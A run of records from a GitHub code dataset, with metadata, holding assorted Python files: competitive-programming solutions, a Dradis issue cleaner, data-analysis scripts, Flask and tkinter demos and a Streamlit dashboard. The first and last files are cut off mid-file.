stk.append(c)\n continue\n t = f = 0\n while stk[-1] != '(':\n if stk.pop() == 't':\n t += 1\n else:\n f += 1\n stk.pop()\n op = stk.pop()\n if op == '!':\n stk.append('t' if f == 1 else 'f')\n elif op == '&':\n stk.append('t' if f == 0 else 'f')\n elif op == '|':\n stk.append('t' if t else 'f')\n return stk[-1] == 't'","repo_name":"ZrjaK/algorithm","sub_path":"OJ/leetcode/1106.解析布尔表达式.py","file_name":"1106.解析布尔表达式.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31613808020","text":"from sys import stdin as s\r\nimport heapq\r\n#s = open(\"input.txt\",\"rt\")\r\nN,D = map(int, s.readline().split())\r\ngraph = [[] for _ in range(D+1)]\r\n\r\n# 그래프 정보 입력\r\n# 다음 지점으로 1씩 움직이는 경우 추가 \r\n# (다음 노드, 거리값)\r\nfor i in range(D):\r\n graph[i].append((i+1,1))\r\n# 지름길 정보 입력\r\nfor _ in range(N):\r\n start, end, length = map(int, s.readline().split())\r\n if end > D :\r\n continue # 도착 지점보다 먼 지점은 넘기기\r\n\r\n graph[start].append((end,length))\r\n\r\n# single source shortest path 정보 저장 테이블\r\ninf = 987654321\r\ndistance = [inf] * (D+1)\r\ndistance[0] = 0 \r\n\r\nq = []\r\nheapq.heappush(q,(0,0)) # 시작 노드는 0 (우선순위=거리, 도착노드) \r\nwhile q:\r\n dist, now = heapq.heappop(q) # 현재 도착노드까지의 거리, 현재 도착 노드\r\n\r\n # distance에 기록된 거리보다 크면 업데이트 X\r\n if distance[now] < dist :\r\n continue \r\n\r\n for connection in graph[now] :\r\n # connection[0] = 도착노드\r\n # connection[1] = 거리\r\n cost = dist + connection[1] # now까지 거리 + 그 다음노드까지 거리\r\n if (distance[connection[0]] > cost):\r\n distance[connection[0]] = cost\r\n heapq.heappush(q,(cost,connection[0]))\r\n \r\nprint(distance[D])","repo_name":"kjimin0619/ps-practice","sub_path":"백준/Silver/1446. 지름길/지름길.py","file_name":"지름길.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11333010344","text":"\"\"\"\nCustom exception class and helper functions for exception\nhandling and logging.\n\"\"\"\nimport sys\nfrom typing import Any\n\nfrom src.middleware.logger import logger\n\n\nclass CustomException(Exception):\n \"\"\"Custom exception class for handling specific exceptions.\"\"\"\n\n def __init__(self, error_message: Any, error_detail: Any):\n self.error_message = error_message_detail(\n error_message, error_detail=error_detail\n )\n\n def __str__(self) -> str:\n return self.error_message\n\n\ndef error_message_detail(error: Any, error_detail: Any) -> str:\n \"\"\"Format and log error details,\n and return the error messages a string.\"\"\"\n _, _, exc_tb = error_detail.exc_info()\n if exc_tb is None:\n raise CustomException(error, sys) from error\n file_name = exc_tb.tb_frame.f_code.co_filename\n logger.error(\n \"Error occurred in python script name [%s] \"\n \"line number [%d] error message [%s]\",\n file_name,\n exc_tb.tb_lineno,\n str(error),\n )\n return str(error)\n\n\nif __name__ == \"__main__\":\n try:\n _ = 1 / 0\n except Exception as e:\n logger.debug(\"Test CustomException\")\n raise CustomException(e, sys) from e\n","repo_name":"KarthikUdyawar/passwordometer","sub_path":"src/middleware/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41782390026","text":"from sys import stdin\ninput = stdin.readline\n\nn = int(input())\ntemp = []\nfor _ in range(n):\n age, name = map(str,input().split())\n age = int(age)\n temp.append((age,name))\ntemp.sort(key = lambda x:x[0])\nfor i in temp:\n print(i[0],i[1])","repo_name":"seongddiyong/practice_coding","sub_path":"python/정렬/b10814.py","file_name":"b10814.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72981236806","text":"from pydradis3 import Pydradis3\nfrom json import dumps\nfrom sys import argv, exit, version\nfrom argparse import ArgumentParser\nimport time\nimport datetime\nimport re\n\n#### Not even started! ####\nclass EvidenceJanitorScript(object):\n def __init__(self):\n self.arg = self.processArguments()\n if len(argv) != 4:\n print(\"Possibly missing arguments. Try HELP\")\n exit(-6)\n # Dradis API Configuration\n self.verifyCert = True # change this to make requests without verifying\n self.dradisApiToken = self.arg.dradisApiToken\n self.dradisProjectId = self.arg.dradisProjectId\n self.dradisUrl = self.arg.dradisUrl\n self.dradisDebug = False\n self.dradisSession = Pydradis3(self.dradisApiToken, self.dradisUrl, self.dradisDebug, self.verifyCert)\n \n def run(self):\n try:\n self.issueCleaner(self.dradisProjectId)\n except Exception as e:\n print('Failed in run: {0}'.format(e))\n exit(-1)\n self.dradisSession = None\n return 0\n\n def stripTrash(self, dirtyText: str):\n sanitizedText = dirtyText.replace('\"','"').replace(\"'\",\"'\").replace(\"<\",\"<\").replace(\">\",\">\").replace(\"&\",\"&\")\n return sanitizedText\n\n def issueCleaner(self, projectId):\n # Remove bad XML characters from Dradis issues\n today = str(datetime.datetime.now())\n newCveSite = 'https://cvedetails.com/cve/'\n refPattern = re.compile(r'References')\n cvePattern = re.compile(r'CVE_ID')\n cwePattern = re.compile(r'CWE_ID')\n modulePattern = re.compile(r'Module_OTGv4')\n touchedByPattern = re.compile(r'Touched_By')\n\n issueList = self.dradisSession.get_issuelist(pid=projectId)\n\n # Loop over every primary issue (highest level JSON object) in the dict containing all Dradis issues\n for issueEntry in issueList:\n issueId = issueEntry[1]\n print(\"Sanitizing issue {0}...\".format(issueId))\n issue = self.dradisSession.get_issue(pid=projectId, issue_id=issueId)\n sanitizedFields = []\n # Loop over every field and value within each Dradis issue\n issueTitle = issueModules = issueText = frankenstein = '' \n cweField = '\\r\\n#[CWE_ID]#\\r\\n'\n cveField = '\\r\\n#[CVE_ID]#\\r\\n'\n endOfIssue = realEndOfIssue = 0\n for key, value in issue.items():\n # Storing current issue title, for debugging\n if key == 'title':\n issue_title = self.stripTrash(str(issue[key]))\n issueTitle = \"#[Title]#\\r\\n\" + issue_title + \"\\r\\n\\r\\n\"\n\n # Appending the entirety of the current issue into a string variable\n if key == 'text':\n issueText = self.stripTrash(str(issue[key]))\n realEndOfIssue = len(issueText)\n myEnd = re.search(modulePattern, issue[key])\n touchMe = re.search(touchedByPattern, issue[key])\n if not touchMe:\n if myEnd:\n x = myEnd.start() - 2\n y = myEnd.end() + 2\n endOfIssue = len(issueText) - x\n issueModules = myEnd.string[x:]\n else:\n issueModules = \"#[Module_OTGv4]#\\r\\n\\r\\n#[Module_PCIDSS32]#\\r\\n\\r\\n#[Module_HIPAA]#\\r\\n\\r\\n#[Module_NIST53]#\\r\\n\\r\\n#[Module_ISO27K2013]#\\r\\n\\r\\n#[Module_GDPR2016]#\\r\\n\\r\\n#[Touched_By]#\\r\\nCVE_Bot_\" + today + \"\\r\\n\\r\\n\"\n else:\n a = touchMe.start() - 2\n b = touchMe.end() + 2\n if myEnd:\n y = myEnd.start() - 2\n z = myEnd.end() + 2\n issueModules = myEnd.string[y:z]\n else:\n issueModules = \"#[Module_OTGv4]#\\r\\n\\r\\n#[Module_PCIDSS32]#\\r\\n\\r\\n#[Module_HIPAA]#\\r\\n\\r\\n#[Module_NIST53]#\\r\\n\\r\\n#[Module_ISO27K2013]#\\r\\n\\r\\n#[Module_GDPR2016]#\\r\\n\\r\\n\"\n\n # 'Fields' is a JSON parameter that contains its own JSON parameters, so it is its own dict. Loop over it to dig inside each issue.\n if key == 'fields':\n fields = value\n # Looping over every key and value of the fields dict\n for cey, falue in fields.items():\n sanitizedFormattedValue = \"#[{0}]#\\r\\n{1}\\r\\n\\r\\n\".format(cey, self.stripTrash(str(fields[cey])))\n if cey != 'Touched_By':\n sanitizedFields.append(sanitizedFormattedValue)\n else:\n sanitizedFields.append(\"#[{0}]#\\r\\nJanitor_Bot_{1}\\r\\n\\r\\n\".format(cey, today))\n\n sanitizedIssueText = ''.join(str(listEntry) for listEntry in sanitizedFields)\n\n # This is the only way to do PUT or POST requests with Dradis API\n data = {'issue': {\"text\": sanitizedIssueText}}\n issueUpdate = self.dradisSession.update_issue_raw(pid=projectId, issue_id=issueId, data=data)\n return\n\n def evidenceCleaner(self):\n # Removing bad XML characters from evidence in Dradis project\n # HTTP GET request headers\n headers = {'Authorization': 'Token token={0}'.format(self.dradis_api_token), 'Dradis-Project-Id': self.dradis_project_id}\n\n\t\t# HTTP PUT request headers\n putHeaders = {'Authorization': 'Token token={0}'.format(self.dradis_api_token), 'Dradis-Project-Id': self.dradis_project_id, 'Content-Type':'application/json'}\n\n # HTTP GET request to get all issues in the specified Dradis project\n response = self.session.get(self.dradis_evidence_url, headers=headers, verify=self.verify_cert)\n\n # If the above GET request returns 200 code, let the user know, otherwise say what's wrong\n if '[200]' in str(response):\n print('HTTP 200 OK')\n else:\n print('Did not receive HTTP 200 code, probably incorrect Dradis url argument. ' + str(response))\n \n # Convert the GET response into a JSON object which will be interpreted by Python as a dict, lovely\n evidences = response.json()\n\n # Loop over every primary issue (highest level JSON object) in the dict containing all Dradis issues\n for evidence in evidences:\n # Loop over every field and value within each Dradis evidence\n issueResult = ''\n issueTitle = ''\n issue_id = ''\n evidenceText = ''\n evidenceResult = ''\n for key, value in evidence.items():\n # Code to find issue ID, which is used to identify the issue and is used in the PUT URL, very important\n if key == 'id':\n issue_id = str(issue[key])\n dradis_issue_url = self.dradis_issues_url + '/' + issue_id\n\n # Storing current issue title, for debugging\n if key == 'title':\n issue_title = self.stripTrash(str(issue[key]))\n issueTitle = \"#[Title]#\\r\\n\" + issue_title + \"\\r\\n\\r\\n\"\n #print('KEY: ' + str(key) + ' VALUE: ' + str(value)) # Listing every issue field and value just to show that it is working\n\n # Appending the entirety of the current issue into a string variable\n if key == 'text':\n evidenceText = self.stripTrash(str(evidence[key]))\n\n # 'Fields' is a JSON parameter that contains its own JSON parameters, so it is its own dict. Loop over it to dig inside each issue.\n if key == 'fields':\n fields = value\n # Looping over every key and value of the fields dict\n for cey, falue in fields.items():\n if cey == 'Result':\n evidenceResult = \"#[Result]#\\r\\n\" + self.stripTrash(str(fields[cey])) + \"\\r\\n\\r\\n\"\n \n frankenstein = evidenceResult\n\n # This is the only way to do PUT or POST requests with Dradis API\n issue_data = {'issue': {\"text\": frankenstein}}\n\n # The almighty HTTP PUT request to edit issues\n dradis = requests.put(dradis_evidence_url, data=dumps(issue_data), headers=putHeaders, verify=self.verify_cert)\n if dradis.status_code == 200:\n print(\"Successfully cleaned up evidence for the following issue: \" + issue_title)\n else:\n print(\"Failed cleaning up evidence for the following issue: \\n\\n{1}\\nStatus Code: {2}\\n\\n\".format(dradis.status_code, dradis.text))\n return\n\n def processArguments(self):\n # parse the arguments\n parser = ArgumentParser(epilog='\\tExample: \\r\\npython ' + argv[0] +\n \"https://dradis-pro.dev 21 xa632ghas87d393287\",\n description=\"Remove bad XML characters from Dradis issues\")\n parser.add_argument('dradisUrl', help=\"Dradis URL\")\n parser.add_argument('dradisProjectId', help=\"Dradis Project ID\")\n parser.add_argument('dradisApiToken', help=\"Dradis API token\")\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n start_time = time.time()\n scriptInstance = EvidenceJanitorScript()\n scriptInstance.run()\n print(\"\\n\\n%s seconds\" % (time.time() - start_time))\n","repo_name":"kurtwuckertjr/dradis-issue-janitorbot","sub_path":"dradisEvidenceJanitor.py","file_name":"dradisEvidenceJanitor.py","file_ext":"py","file_size_in_byte":9567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1868624568","text":"def tester():\r\n selected_food = 'Chef''s Salad'\r\n chosen_restaurant = request.args.get('restaurant')\r\n nlp = spacy.load(\"en_core_web_md\")\r\n selected_food_processed = nlp(selected_food)\r\n query_names = f\"\"\"SELECT gf.name FROM grubhub_food gf\r\n JOIN grubhub_available ga ON gf.food_id = ga.food_id\r\n JOIN grubhub_restaurant gr ON ga.restaurant_id = gr.restaurant_id\r\n WHERE gr.name = 'chick-fil-a';\"\"\"\r\n cursor = mysql.connection.cursor()\r\n cursor.execute(query_names)\r\n rows = cursor.fetchall()\r\n max_similarity = 0\r\n result = None \r\n for row in rows:\r\n row_doc = nlp(row[0])\r\n curr_similarity = selected_food_processed.similarity(row_doc)\r\n if curr_similarity > max_similarity:\r\n max_similarity = curr_similarity\r\n result = row[0]\r\n cursor.close()\r\n return {'name': result}","repo_name":"yannivu/ndfood","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25110905185","text":"\"\"\"\n\nAuthor: Janith Weeraman\n\nmethods that takes a STRINGID formatted interaction file and then outputs an interaction file with names corresponding\nto a given source or uniprot of the given source does not exist\n\n\"\"\"\n\nimport gzip, os\nimport networkx as nx\n\naliasfile = \"gz/39947.protein.aliases.v11.5.txt.gz\"\nsource_file = \"txt/ppi.tsv\"\noutput_file = \"txt/named_ppi.tsv\"\npreferred_source = \"Uniprot\"\ngraphfile = 'test.gexf'\n\n\ndef create_aliasdict(aliasfile=aliasfile):\n \"\"\"\n A method that takes a protein alias file as a gzip file and builds a dictionary with keys being STRINGIDs\n and values being dictionaries containing keys as sources and corresponding source-related names as values within\n the nested dict\n\n :param aliasfile: the protein alias file for an organism from STRING website\n :return: a dict with { STRINGID: { SOURCE : Name } } items\n \"\"\"\n alias_key = {} # dict to hold aliases\n\n with gzip.open(os.path.join(aliasfile), 'rt') as file:\n file.readline()\n line = file.readline()\n\n while line:\n # Split each line into it's items\n items = line.rstrip().split('\\t')\n # Get the alias list for STRINGID of current line\n # Find the aliases for the stringID in the line from the dict and put into a temp variable\n tmp = alias_key.get(items[0], {})\n # get the source for the current line\n source = items[-1]\n # Add the new source and name into the alias list dict\n tmp[source] = items[1]\n # replace the aliasdict for the current STRINGID with the one with the current source added\n alias_key[items[0]] = tmp\n line = file.readline()\n\n return alias_key\n\ndef stringidconvert(proteinlist,aliasdict=create_aliasdict(aliasfile),source='BLAST_UniProt_ID'):\n\n outputproteins = []\n for prot in proteinlist:\n aliases = aliasdict.get(prot,None)\n\n if aliases is not None:\n outputproteins.append(aliases[source])\n else:\n outputproteins.append('')\n\n return outputproteins\n\ndef id2stringdict(aliasfile=aliasfile,source='BLAST_UniProt_ID'):\n \"\"\"\n Function that will take in an aliasfile and convert it into an aliasdict dictionary. It will then create a new\n dictionary where the key is the name of a protein in the given source format andt he value is the STRING ID of the\n protein\n\n Parameters\n ----------\n aliasfile : the path to a file containing protein aliases\n source: the preferred source to have as a key. Default is BLAST_UniProt_ID\n\n Returns\n -------\n dict: dictionary of keys as source names and values as STRING IDs\n \"\"\"\n\n alias_key = create_aliasdict(aliasfile)\n\n newdict = {}\n for key,item in alias_key.items():\n newkey = item[source]\n newdict[newkey] = key\n\n return newdict\n\nif __name__ == \"__main__\":\n from cluster_drought_module_greedy import descendingdictkeys\n\n aliasdict = create_aliasdict(aliasfile)\n\n sources = {}\n numprots = len(aliasdict.keys())\n print(f\"numprots: {numprots}\")\n for item in aliasdict.values():\n for sc in item.keys():\n try:\n sources[sc] += 1\n except KeyError:\n sources[sc] = 1\n\n keys = descendingdictkeys(sources)\n print(keys)","repo_name":"Kornelius20-20/NpropRice","sub_path":"stringInteractions2namedInteractions.py","file_name":"stringInteractions2namedInteractions.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27087842698","text":"import pandas as pd\nimport logging\n\nlogger = logging.getLogger(__name__)\n\ndef get_scores(config, scores):\n scores['is_positive'] = scores['bid'] >= config['POSITIVE_BID_THR']\n bid2exponent = {'bid':[0.05,1,2,4,6],'exponent': config['HYPER_PARAMS']['bid_inverse_exponents']}\n #[1/0.05, 1.0, 1.0/2, 1.0/4.0 , 1.0/6.0]}\n bid2exponent = pd.DataFrame(bid2exponent)\n scores = scores.reset_index().merge(bid2exponent,how='left',on='bid').set_index(['paper','reviewer'])\n epsilon = 0.0000001\n \n #match score: avg of ntpms and nacl\n scores['ms'] = (scores['ntpms'] + scores['nacl'])/2 \n #if ntpms is na, then overwrite by nacl\n scores.loc[scores['ntpms'].isna(),'ms'] = scores['nacl'].loc[scores['ntpms'].isna()]\n #if nacl is na, overwrite by ntpms\n scores.loc[scores['nacl'].isna(),'ms'] = scores['ntpms'].loc[scores['nacl'].isna()]\n\n #agg score: avg of match score and keyword score\n scores['scores_base'] = (scores['ms'] + scores['nk'])/2\n #if match score is na, overwrite by keyword score\n scores.loc[scores['ms'].isna(),'scores_base'] = scores['nk'].loc[scores['ms'].isna()]\n #if keyword score is na, overwrite by match score\n scores.loc[scores['nk'].isna(),'scores_base'] = scores['ms'].loc[scores['nk'].isna()]\n \n # tweaking based on bid value\n condn = scores['is_positive'] & (scores['nk'] < epsilon)\n #if bid is positive and keyword score < epsilon, overwrite by match score\n scores.loc[condn,'scores_base'] = scores['ms'].loc[condn]\n \n #if everything is na, score = 0\n scores.loc[scores['scores_base'].isna(),'scores_base'] = 0.0\n #\n scores['score'] = scores['scores_base']**(1.0/scores['exponent'])\n \n # if score is below this thr, then backoff to keyword score only\n lower_thr = 0.15\n #select all scores less than 0.15\n condn_ll = (scores['score'] <= lower_thr) & (~scores['nk'].isna())\n #recompute them as ((nk)^(1/exponent)).clip(upper=0.15)\n scores.loc[condn_ll,'score'] = (scores['nk'].loc[condn_ll]**(1.0/scores['exponent'].loc[condn_ll])).clip(upper=lower_thr)\n return scores\n\ndef compute_scores(config=None):\n\n scores = pd.read_csv(config['RAW_SCORES_FILE']).set_index(['paper','reviewer'])\n bids = pd.read_csv(config['BIDS_FILE']).set_index(['paper','reviewer'])\n scores = scores.join(bids)\n scores['bid'] = scores['bid'].fillna(config['DEFAULT_BID_WHEN_NO_BIDS'])\n\n scores = get_scores(config,scores)\n scores = scores[['score']]\n num_entries_before = scores.size\n scores = scores.query('score > 0')\n num_entries_after = scores.size\n logger.info(f'Filtered scores <= 0. {(num_entries_before - num_entries_after) / num_entries_before} fraction removed ...')\n logger.info(f\"Caching aggregated score to {config['CACHED_SCORES_FILE']} to save time during next run. To recompute, delete this file and rerun this script.\")\n scores.to_csv(config['CACHED_SCORES_FILE'])\n return scores\n\n","repo_name":"ChrisCameron1/LargeConferenceMatching","sub_path":"compute_scores.py","file_name":"compute_scores.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"16235156034","text":"\r\n\r\n\r\n\r\n###### Data Preparation ####\r\n\r\n\"\"\"Step 1: read armut_data.csv \"\"\"\r\n\r\n\r\nimport pandas as pd\r\npd.set_option(\"display.max_columns\", None)\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\n\r\ndf = pd.read_csv(\"armut_data.csv\")\r\n\r\n\"\"\"\r\nStep 2: ServiceID represents a different service for each CategoryID.\r\n Create a new variable that represents these services by combining ServiceID \r\n and CategoryID with an underscore \"_\".\r\n\"\"\"\r\n\r\ndf[\"Hizmet\"] = df[\"ServiceId\"].astype(str) + \"_\" + df[\"CategoryId\"].astype(str)\r\n\r\ndf.head()\r\n\r\n\"\"\" \r\nStep 3 : The data set consists of the date and time when the service transactions were made, \r\nand there is no basket definition (e.g., invoice). \r\nIn order to apply Association Rule Learning, a basket definition (e.g., invoice) needs to be created. \r\nHere, the basket definition refers to the services each customer receives on a monthly basis.\r\nFor example, customer with ID 7256 has a basket consisting of services 9_4 and 46_4 that they received in August 2017,\r\nand another basket consisting of services 9_4 and 38_4 that they received in October 2017. \r\nBaskets should be identified with a unique ID. To do this, first create a new date variable that only includes the year and month. \r\nCombine the UserID and the newly created date variable with \"_\" and assign it to a new variable called ID. \r\n\"\"\"\r\n\r\ndf.info\r\n\r\ndf[\"CreateDate\"] = pd.to_datetime(df[\"CreateDate\"])\r\ndf[\"New_Date\"] = df[\"CreateDate\"].dt.strftime(\"%Y-%m\")\r\n\r\ndf.info()\r\ndf.head()\r\n\r\ndf[\"SepetId\"] = df[\"UserId\"].astype(str) + \"_\" + df[\"New_Date\"]\r\n\r\n\r\n\r\n\"\"\"Step 1 : Create pivot table \"\"\"\r\n\r\n\r\n\r\ninvoice_product_df = df.groupby([\"SepetId\", \"Hizmet\"])[\"Hizmet\"].count().unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0)\r\ninvoice_product_df.head()\r\n\r\n\"\"\"Step : 2 Create Association Rules \"\"\"\r\nasr_df = apriori(invoice_product_df, min_support=0.01, use_colnames=True)\r\nasr_rules = association_rules(asr_df, metric=\"support\", min_threshold=0.01)\r\nasr_rules.head()\r\n\r\n\r\n\"\"\" Step 3 : \"Using the arl_recommender function,\r\n provide service recommendations to a user who recently received the service 2_0. \"\"\"\r\n\r\ndef arl_recommender(rules_df, product_id, rec_count=1):\r\n sorted_rules = rules_df.sort_values(\"lift\", ascending=False)\r\n recommendation_list = []\r\n for i, product in sorted_rules[\"antecedents\"].items():\r\n for j in list(product):\r\n if j == product_id:\r\n recommendation_list.append(list(sorted_rules.iloc[i][\"consequents\"]))\r\n\r\n recommendation_list = list({item for item_list in recommendation_list for item in item_list})\r\n return recommendation_list[:rec_count]\r\n\r\narl_recommender(asr_rules, \"2_0\", 1)\r\n","repo_name":"musaogdu/ArmutProject","sub_path":"ArmutProject.py","file_name":"ArmutProject.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24097030759","text":"from model.doctor_list import DoctorList\nfrom model.appointment_list import AppointmentList\nfrom controller.appointment_controller import AppointmentController\nfrom flask import Flask\nfrom view.flask_wrapper import FlaskAppWrapper\nfrom model.patient_list import PatientList\nfrom controller.doctor_controller import DoctorController\nfrom controller.patient_controller import PatientController\n\nflask_app = Flask(__name__)\n\napp = FlaskAppWrapper(flask_app)\n\ndl = DoctorList()\npl = PatientList()\nal = AppointmentList()\nac = AppointmentController()\ndc = DoctorController()\npc = PatientController()\n\n# create appointment\napp.add_endpoint('/api/add',\n 'add_app', ac.create_appointment, methods=['POST'])\n\n# cancel appointment\napp.add_endpoint('/api/cancel',\n 'cancel_app', ac.cancel_appointment, methods=['DELETE'])\n\n# get appointment by doctor/patient name\napp.add_endpoint('/api/get',\n 'get_doc_appointments', ac.get_appointments)\n\n# get all appointments\napp.add_endpoint('/api/all', 'get_all_appointments', ac.get_all_appointments)\n\n# extra endpoint to fetch via ID\napp.add_endpoint('/api/get_by_id', 'get_apps_by_id', ac.get_appointments_by_id)\n\n# get doctor details by ID\napp.add_endpoint('/api/get/doctor', 'get_doc_by_id', dc.get_doctor_details)\n\n# add doctor\napp.add_endpoint('/api/add/doctor', 'add_doc',\n dc.create_doctor, methods=['POST'])\n\n# delete doctor by ID\napp.add_endpoint('/api/delete/doctor', 'delete_doctor',\n dc.delete_doctor, methods=['DELETE'])\n\n# get patient details by ID\napp.add_endpoint('/api/get/patient', 'get_patient_by_id',\n pc.get_patient_details)\n\n# add patient\napp.add_endpoint('/api/add/patient', 'add_patient',\n pc.create_patient, methods=['POST'])\n\n# delete patient by ID\napp.add_endpoint('/api/delete/patient', 'delete_patient',\n pc.delete_patient, methods=['DELETE'])\n\n# view all doctors\napp.add_endpoint('/api/get/doctors', 'get_all_docs', dc.get_all_doctors)\n\n# view all patients\napp.add_endpoint('/api/get/patients', 'get_all_patients', pc.get_all_patients)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"raghavm1/d4l-task","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4197825675","text":"from flask import Flask,jsonify,request, render_template\nimport units\n\napp = Flask(__name__)\n\n@app.route('/')\ndef man():\n return render_template('home.html')\n\n@app.route('/predict',methods = ['POST'])\ndef pred():\n \n data = request.form\n if request.method == 'POST':\n print('Input data is:',data)\n x = int(data['x'])\n y = int(data['y'])\n z = int(data['z'])\n \n\n msg = units.pred_class(x,y,z)\n\n return render_template('after.html', data=int(msg))\n else:\n return jsonify({\"message\":\"unsuccessful\"})\n \n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8080, debug=True) \n\n","repo_name":"sd72219/awsfirst","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8214945239","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport copy\nimport streamlit as st\n\nst.title(\"Imperial Healthtech Customer Activity Dashboard\")\nst.write(\"Muhamad Bagus Septian\")\n\ndf = pd.read_csv(\"app_data.csv\")\n\n@st.cache(suppress_st_warning=True, allow_output_mutation=True)\ndef load_data(df):\n df = pd.read_csv(\"app_data.csv\")\n return df\n\ndata = copy.deepcopy(load_data(df))\n\ndata['Date'] = pd.to_datetime(data['Date'], format='%Y-%m-%d')\n\nsns.set()\nst.subheader(\"Daily Device Installs in November 20222\")\nfig1, ax1 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Daily Device Installs\"])\nst.pyplot(fig1)\n\nst.subheader(\"Daily User Installs in November 20222\")\nfig2, ax2 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Daily User Installs\"])\nsns.set()\nst.pyplot(fig2)\n\nst.subheader(\"Daily User Uninstalls in November 20222\")\nfig3, ax3 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Daily User Uninstalls\"])\nsns.set()\nst.pyplot(fig3)\n\nst.subheader(\"Active Device Installs in November 20222\")\nfig4, ax4 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Active Device Installs\"])\nsns.set()\nst.pyplot(fig4)\n\nst.subheader(\"Install events in November 20222\")\nfig5, ax5 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Install events\"])\nsns.set()\nst.pyplot(fig5)\n\nst.subheader(\"Update events in November 20222\")\nfig6, ax6 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Update events\"])\nsns.set()\nst.pyplot(fig6)\n\nst.subheader(\"Uninstall events in November 20222\")\nfig7, ax7 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Uninstall events\"])\nsns.set()\nst.pyplot(fig7)\n\n","repo_name":"bagus-septian/imperial_healthtech","sub_path":"da_test.py","file_name":"da_test.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10308755188","text":"import tkinter as tk\n\nunesena_slova = ''\n\ndef handle_keypress(event):\n print(event.char)\n global unesena_slova\n unesena_slova += str(event.char)\n label_tekst_var.set(unesena_slova)\n\nroot = tk.Tk()\nroot.title('Algebra - Python Developer')\nroot.geometry('600x400')\n\nlabel_tekst_var = tk.StringVar()\nlabel_tekst_var.set('Ovo je mjesto gdje će se prikazivati unesena slova')\n\nlabel_naslov = tk.Label(root,\n text= 'Key Event',\n font = ('Segoe UI', 18))\n\nlabel_naslov.grid(column=0, row=0)\n\nlabel_ispis = tk.Label(root, \n textvariable=label_tekst_var, font = ('Segoe UI', 24), fg = 'red')\n\nlabel_ispis.grid(column=0, row = 1)\n\nroot.bind(\"\", handle_keypress)\n\nroot.mainloop()","repo_name":"pinjamar/python_tasks_collection","sub_path":"algebra/19_tkinter_events_1.py","file_name":"19_tkinter_events_1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1746044000","text":"\nimport numpy as np\nfrom scipy import linalg\nimport math\n\ndef conforme(gcpD1, gcpD2, knowD1, output, verbose=False):\n L = np.loadtxt(str(gcpD1))\n A = np.zeros((2*L.shape[0],4),float)\n A[ ::2, 0] = 1.0\n A[1::2, 1] = 1.0\n A[ ::2, 2] = L[:,0]\n A[1::2, 2] = L[:,1]\n A[ ::2, 3] = L[:,1]\n A[1::2, 3] = -L[:,0]\n G = np.loadtxt(str(gcpD2))\n Y = np.zeros((2*G.shape[0],1),float)\n Y[ ::2, 0] = G[:,0]\n Y[1::2, 0] = G[:,1]\n N = np.dot(A.T.conj(), A)\n T = np.dot(A.T.conj(), Y)\n C = np.dot(linalg.inv(N), T)\n Lambda = abs(C[2]+C[3]*1j)\n Alpha = np.angle(C[2]+C[3]*1j)\n E0 = C[0]\n N0 = C[1]\n LX = np.loadtxt(str(knowD1))\n ss = LX.shape[0]\n pq = G.shape[0]\n ENglob = np.zeros((ss,2),float)\n lam = math.sqrt(C[2]** + C[3]**2)\n alp = np.arctan(C[3] / C[2]) / (math.pi / 180.)\n for i in np.arange(ss):\n E2 = E0+LX[i,0]*C[2]+LX[i,1]*C[3]\n N2 = N0+LX[i,1]*C[2]-LX[i,0]*C[3]\n ENglob[i,:] = np.hstack((E2,N2))\n np.savetxt(output, ENglob)\n sq = LX.shape[0]\n sqx = np.zeros((G.shape[0],1),float)\n sqy = np.zeros((G.shape[0],1),float)\n sqx[ ::1, 0] = G[:,0]\n sqy[::1, 0] = G[:,1]\n sizeq = sqx.shape[0]\n scartix = np.zeros((sizeq,1),float)\n scartiy = 